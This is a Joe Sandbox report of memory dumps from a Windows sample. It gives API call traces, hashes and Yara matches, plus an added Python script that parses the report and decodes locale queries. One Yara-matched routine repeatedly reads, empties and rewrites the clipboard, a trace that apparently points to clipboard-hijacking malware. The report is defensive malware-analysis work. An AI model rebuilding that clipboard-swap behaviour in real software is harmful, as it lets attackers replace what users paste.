                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                                                                                                                  • Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                                                                                                                                                                  • Instruction ID: 4d174249788eeb6afcd1119ee109bea02bf0543b951493d32b1ba631c5db93a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18319CB1604716AFC710DE2AC88091ABFA8BF84351F04853EFC44A7391D779EA548BCA
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 323602529-0
                                                                                                                                                                                                                                                  • Opcode ID: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                                                                                                                                                                                                  • Instruction ID: a96161e1099ed2e4ebc89c8b3bfd47f038f5993eec498a984b7603ffbfb0c6fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8312BB4D002199BDB14EFA5D881AEDBBB4BF48304F5085AEE415B3281DB786A48CF54
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3886170330-0
                                                                                                                                                                                                                                                  • Opcode ID: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                                                                                                                                                                                                  • Instruction ID: df22ffae6d2fe3b800e0c8e4f2770173a5e1bd04bbee8454eb0c8e7fe139aa3e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1215B70A00205EFCB15DF55C484EAEBBB5BF88705F14816EE805AB3A1C778AE50DF94
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __wsopen_s
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3347428461-0
                                                                                                                                                                                                                                                  • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                  • Instruction ID: ab2784c25bcc6a383b761dc233afc1089a93ea485bdb2d241c4dcfca41164893
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511487590420AAFCF05DF58E94199B7BF4FF48314F10406AF808AB311D770EA11CBA9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
• API String ID: 269201875-0
• Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
• Instruction ID: 35ea3ad1aa6a7a88a67b465f5c451a9d93fb5bd3893c922deb476a376b6bfb46
• Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
• Instruction Fuzzy Hash: 3EF0BE33810008BBCF115E96DC01DDF3B6EEF8D339F100116F914921A0DB3ACA22ABA4
APIs
• RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
• Instruction ID: eec6a97fd20e662809c0c25a02e68f43ccf4a0d84c2e20558320e6cd2c3c69d0
• Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
• Instruction Fuzzy Hash: 6CE0E5213006207FDA303F675C06B5B36489F49BBAF142137AC06927D1DB2CEE0085ED
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 004103B7
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Exception@8Throw
• String ID:
• API String ID: 2005118841-0
• Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
• Instruction ID: 7514a9331385c8c8780a364a21f4f069850cbfc0a8d6a65b648f56ba84841e90
• Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
• Instruction Fuzzy Hash: 75E02B3050020DB3CB147665FC1185D777C5A10318BA04237BC28A14D1DF78E59DC48D
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
• Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
• Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
• Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00629CC6
Memory Dump Source
• Source File: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, Offset: 00629000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_629000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: fb11958d1d329d5b61a0ffef338bfa367a5348b0de719f1a5b1f9711c80072e0
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: AB113C79A00208EFDB01DF98CA85E98BBF5AF48350F058094F9489B362D771EA50DF90
APIs
• __EH_prolog3_GS.LIBCMT ref: 0210194D
• Sleep.KERNEL32(00001541,0000004C), ref: 02101957
  • Part of subcall function 0210CE6D: _strlen.LIBCMT ref: 0210CE84
• OpenClipboard.USER32(00000000), ref: 02101984
• GetClipboardData.USER32(00000001), ref: 02101994
• _strlen.LIBCMT ref: 021019B0
• _strlen.LIBCMT ref: 021019DF
• _strlen.LIBCMT ref: 02101B23
• EmptyClipboard.USER32 ref: 02101B39
• GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 02101B46
• GlobalUnlock.KERNEL32(00000000), ref: 02101B70
• SetClipboardData.USER32(00000001,00000000), ref: 02101B79
• GlobalFree.KERNEL32(00000000), ref: 02101B80
• CloseClipboard.USER32 ref: 02101BA4
• Sleep.KERNEL32(000002D2), ref: 02101BAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
• String ID: 4#E$i
• API String ID: 4246938166-2480119546
• Opcode ID: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
• Instruction ID: f55d5f4a389d85a37d9925c1fbed716b88ad598414c434b06d1d8869a5cba082
• Opcode Fuzzy Hash: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
• Instruction Fuzzy Hash: 31511631C40784EED321DFA8DC857BD7B74FF1A306F045225D805A61A2EBB49785CB69
APIs
• NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 02102392
• GetClientRect.USER32(?,?), ref: 021023A7
• GetDC.USER32(?), ref: 021023AE
• CreateSolidBrush.GDI32(00646464), ref: 021023C1
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 021023E0
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 02102401
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0210240C
• MulDiv.KERNEL32(00000008,00000000), ref: 02102415
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02102439
• SetBkMode.GDI32(?,00000001), ref: 021024C4
• _wcslen.LIBCMT ref: 021024DC
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
• String ID:
• API String ID: 1529870607-0
• Opcode ID: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
• Instruction ID: 1af3e26dae21b5313c84e9e9e02eaf5b1a67a2bbffaff59152def4cc3e2b27bd
• Opcode Fuzzy Hash: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
• Instruction Fuzzy Hash: 2271ED72900228AFDB229F64DD85FAEBBBCEF09711F0041A5F609E6155DA70AF84CF14
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                  • Opcode ID: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                                                                                                                                                                                                  • Instruction ID: eb952a9da5ee3ca1a054b410db7a12ab4ba9b877121e99a49e25e720736a14a4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EC25B71E096288FDB25CE29DD407EAB7B5EB48304F1451EBD84DE7280E778AE818F45
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B7F7
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B820
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,0043BA7D,?,00000000), ref: 0043B835
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                  • Instruction ID: 1b44de1f7026d878333f9870d974062101081d782898e535d61b674f6735b06a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0821CB75A00105A6D7349F14C901BA773AAEF9CF60F569466EA09D7310E736DD41C3D8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0213BCE4,?,00000000), ref: 0213BA5E
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0213BCE4,?,00000000), ref: 0213BA87
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,0213BCE4,?,00000000), ref: 0213BA9C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                  • Instruction ID: 0e2f238ebff29a94d56b55a4f3e8c8d7e666c134ca2cd1d76765d4ab744fba7a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A721B032B8C905AAE7368F55D901BA773A7EB40E6CB578464E90AE7210FB32DF40C350
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA3E
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0043BA99
                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAA8
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,004307A5,00000040,?,004308C5,00000055,00000000,?,?,00000055,00000000), ref: 0043BAF0
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00430825,00000040), ref: 0043BB0F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2287132625-0
                                                                                                                                                                                                                                                  • Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                                                                                                                                                                  • Instruction ID: e5497ab5c31cc8eb6cce8c5579f1d7db95bd29b644ec7623244df27cb8a16c00
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E25173719006099BDB10EFA5DC45BBF73B8FF4C700F14556BEA14E7290EB789A048BA9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132190
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0213219D
                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0213BCA5
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0213BD00
                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0213BD0F
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,02130A0C,00000040,?,02130B2C,00000055,00000000,?,?,00000055,00000000), ref: 0213BD57
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,02130A8C,00000040), ref: 0213BD76
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2287132625-0
                                                                                                                                                                                                                                                  • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                  • Instruction ID: 1148a6f710608a224ad2a513332a81d658c07199864d374a294fd2a2e57f2774
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E517172A4420DAEDB22DFA5CC40ABEB7BAEF04708F054569E914E7150FB719B41CBA1
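The function blocks above repeat across two memory dumps: the same Opcode ID 21f00b6a… is listed once under the image mapped at offset 00400000 (call sites 0043B7F7/0043B820) and once under the region at 02100000 (0213BA5E/0213BA87), and the next pair shares API String ID 2287132625-0 but not its Opcode ID. The GetLocaleInfoW arguments are winnls.h LCType values: 2000000B is LOCALE_RETURN_NUMBER | LOCALE_IDEFAULTCODEPAGE (OEM code page as a number), 20001004 is LOCALE_RETURN_NUMBER | LOCALE_IDEFAULTANSICODEPAGE, and 00001001/00001002 are LOCALE_SENGLANGUAGE/LOCALE_SENGCOUNTRY. The script below is an added triage example, not Joe Sandbox code or part of this report: it parses a constructed excerpt of the blocks on this page (bullet lines copied verbatim, section headers dropped), pairs blocks that recur across dump offsets by Opcode ID and by API String ID, and decodes every GetLocaleInfoW LCType. The regular expressions are assumptions about this extracted layout; the LCType constants are from the Windows SDK.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed excerpt: bullet lines copied from the four complete blocks above.
REPORT = """\
• GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B7F7
• GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B820
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API String ID: 2299586839-711371036
• Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
• Instruction Fuzzy Hash: 0821CB75A00105A6D7349F14C901BA773AAEF9CF60F569466EA09D7310E736DD41C3D8
• GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0213BCE4,?,00000000), ref: 0213BA5E
• GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0213BCE4,?,00000000), ref: 0213BA87
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
• API String ID: 2299586839-711371036
• Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
• Instruction Fuzzy Hash: A721B032B8C905AAE7368F55D901BA773A7EB40E6CB578464E90AE7210FB32DF40C350
  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
• GetLocaleInfoW.KERNEL32(?,00001001,004307A5,00000040,?,004308C5,00000055,00000000,?,?,00000055,00000000), ref: 0043BAF0
• GetLocaleInfoW.KERNEL32(?,00001002,00430825,00000040), ref: 0043BB0F
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API String ID: 2287132625-0
• Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
• Instruction Fuzzy Hash: E25173719006099BDB10EFA5DC45BBF73B8FF4C700F14556BEA14E7290EB789A048BA9
• GetLocaleInfoW.KERNEL32(?,00001001,02130A0C,00000040,?,02130B2C,00000055,00000000,?,?,00000055,00000000), ref: 0213BD57
• GetLocaleInfoW.KERNEL32(?,00001002,02130A8C,00000040), ref: 0213BD76
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
• API String ID: 2287132625-0
• Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
• Instruction Fuzzy Hash: 7E517172A4420DAEDB22DFA5CC40ABEB7BAEF04708F054569E914E7150FB719B41CBA1
"""

# Assumed layout rules: "• Api.MODULE(args), ref: ADDR" (optionally prefixed by
# "Part of subcall function X:") and "• <Field>: <value>" metadata bullets.
CALL_RE = re.compile(r"^\s*•\s+(?:Part of subcall function [0-9A-F]+: )?"
                     r"(\w+)\.(\w+)\((.*)\), ref: ([0-9A-F]{8})$")
FIELD_RE = re.compile(r"^\s*•\s+(Source File|API String ID|Opcode ID|Instruction Fuzzy Hash): (.*)$")

# winnls.h LCType constants (Windows SDK).
LOCALE_RETURN_NUMBER = 0x20000000
LCTYPES = {0x000B: "LOCALE_IDEFAULTCODEPAGE", 0x1004: "LOCALE_IDEFAULTANSICODEPAGE",
           0x1001: "LOCALE_SENGLANGUAGE", 0x1002: "LOCALE_SENGCOUNTRY"}


@dataclass
class FunctionBlock:
    dump_offset: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    calls: list = field(default_factory=list)  # (api, module, [args], call-site ref)


def parse_blocks(text):
    """Split the report text into FunctionBlocks; 'Instruction Fuzzy Hash' closes a block."""
    blocks, cur = [], FunctionBlock()
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            api, module, args, ref = m.groups()
            cur.calls.append((api, module, args.split(","), ref))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "Source File":
            cur.dump_offset = value.split("Offset: ")[1].split(",")[0]
        elif key == "API String ID":
            cur.api_string_id = value
        elif key == "Opcode ID":
            cur.opcode_id = value
        else:  # Instruction Fuzzy Hash is the last field of every block
            blocks.append(cur)
            cur = FunctionBlock()
    return blocks


def shared_code(blocks, key):
    """Map a block attribute ('opcode_id' or 'api_string_id') to the sorted dump
    offsets it occurs in, keeping only values seen in more than one dump."""
    seen = defaultdict(set)
    for b in blocks:
        seen[getattr(b, key)].add(b.dump_offset)
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def decode_lctype(value):
    """Render a GetLocaleInfoW LCType as its winnls.h flag names."""
    names = ["LOCALE_RETURN_NUMBER"] if value & LOCALE_RETURN_NUMBER else []
    base = value & ~LOCALE_RETURN_NUMBER
    names.append(LCTYPES.get(base, f"0x{base:X}"))
    return " | ".join(names)


def locale_queries(blocks):
    """(call site, decoded LCType) for every GetLocaleInfoW call in the blocks."""
    return [(ref, decode_lctype(int(args[1], 16)))
            for b in blocks for api, _mod, args, ref in b.calls if api == "GetLocaleInfoW"]


if __name__ == "__main__":
    blocks = parse_blocks(REPORT)
    for opcode_id, where in shared_code(blocks, "opcode_id").items():
        print(f"identical opcodes {opcode_id[:16]}... present in dumps {where}")
    for api_id, where in shared_code(blocks, "api_string_id").items():
        print(f"same API profile {api_id} present in dumps {where}")
    for ref, lctype in locale_queries(blocks):
        print(f"{ref}: GetLocaleInfoW {lctype}")
```

Grouping by Opcode ID is the stronger signal (byte-identical code at two addresses); the API String ID grouping only says the two blocks call the same set of APIs with the same strings, which is why the second pair matches on it but not on opcodes.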

APIs
  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307AC,?,?,?,?,00430203,?,00000004), ref: 0043B0DC
• _wcschr.LIBVCRUNTIME ref: 0043B16C
• _wcschr.LIBVCRUNTIME ref: 0043B17A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307AC,00000000,004308CC), ref: 0043B21D
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
